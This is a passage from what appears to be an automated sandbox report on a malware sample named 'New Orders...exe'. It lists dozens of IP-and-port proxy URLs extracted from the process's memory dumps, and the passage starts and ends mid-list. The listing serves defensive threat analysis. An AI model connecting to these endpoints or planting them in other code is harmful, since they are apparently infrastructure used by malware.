                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.61:12334
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.61:12334://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.61:12334C4
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.62:12334
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.62:12334://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.91
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.91:12334
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.91:12334://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.67.91.153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.67.91.153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.67.91.153:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.79.44.158:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.79.44.158:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.138.73.54:31145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.138.73.54:31145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.172.161:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.172.161:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.243.38:49685
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.243.38:49685://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.184:19058
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.184:19058://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.221:64384
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.221:64384://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2986E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.169.35.214:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.169.35.214:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:52858
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:52858://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:58053
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:58053://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.33.86:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.33.86:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.147
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.147.185:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.147.185:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.246.166:5566
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.246.166:5566://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.23.57.78
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.23.57.78://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.23.57.78:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.248.243
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.248.243.149:7237
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.248.243.149:7237://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.25.94://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.32.249
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.32.249://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.32.249:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.93.172.32:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.74.57:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.74.57:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.93.234:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.93.234:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.12.25:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.12.25:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.145:8083
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.145:8083%
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.145:8083://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.40.17:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.40.17:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD298F6000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.44.184.138:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD298F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.44.184.138:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.61.44.54:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.61.44.54:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.155.237.74:8111
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.155.237.74:8111://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.157.254.34:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.157.254.34:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.211.244.135:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.211.244.135:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.47.122:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.47.122:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.65.40:55443
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.65.40:55443://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.85.163:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.85.163:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.14:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.14:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.17:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.17:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.36:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.36:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.58:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.58:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.242.146.109:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.242.146.109:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.186
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.186://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.186:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28D9D000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.248.86.237:32650
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.248.86.237:32650://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26785000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2676C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.251.236.227:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2676C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.251.236.227:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.254.84.86:32650
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.254.84.86:32650://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.101.13.110:37902
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.101.13.110:37902://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:6821
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:6821://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.122.10:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.122.10:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.83.206:8000
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.83.206:8000://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.20.116.86:9000
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.20.116.86:9000://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.23.229.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.23.229.203:15673
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.23.229.203:15673://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.44.255.3
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.44.255.3://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.44.255.3:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29910000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.52.241.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.52.241.13:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.52.241.13:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:38242
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:38242://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.229.185:64767
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.229.185:64767://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.94.170:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.94.170:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.104.70:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.104.70:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.106.94:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.106.94:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.106.94:4145p
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.107.145:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.107.145:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.116.114.11:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.116.114.11:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.223.255.109:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.223.255.109:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254.129:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254.129:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.58.185.9:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.58.185.9:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.139.2.212:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.139.2.212:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.179.193.146:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.179.193.146:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.146.212:6001
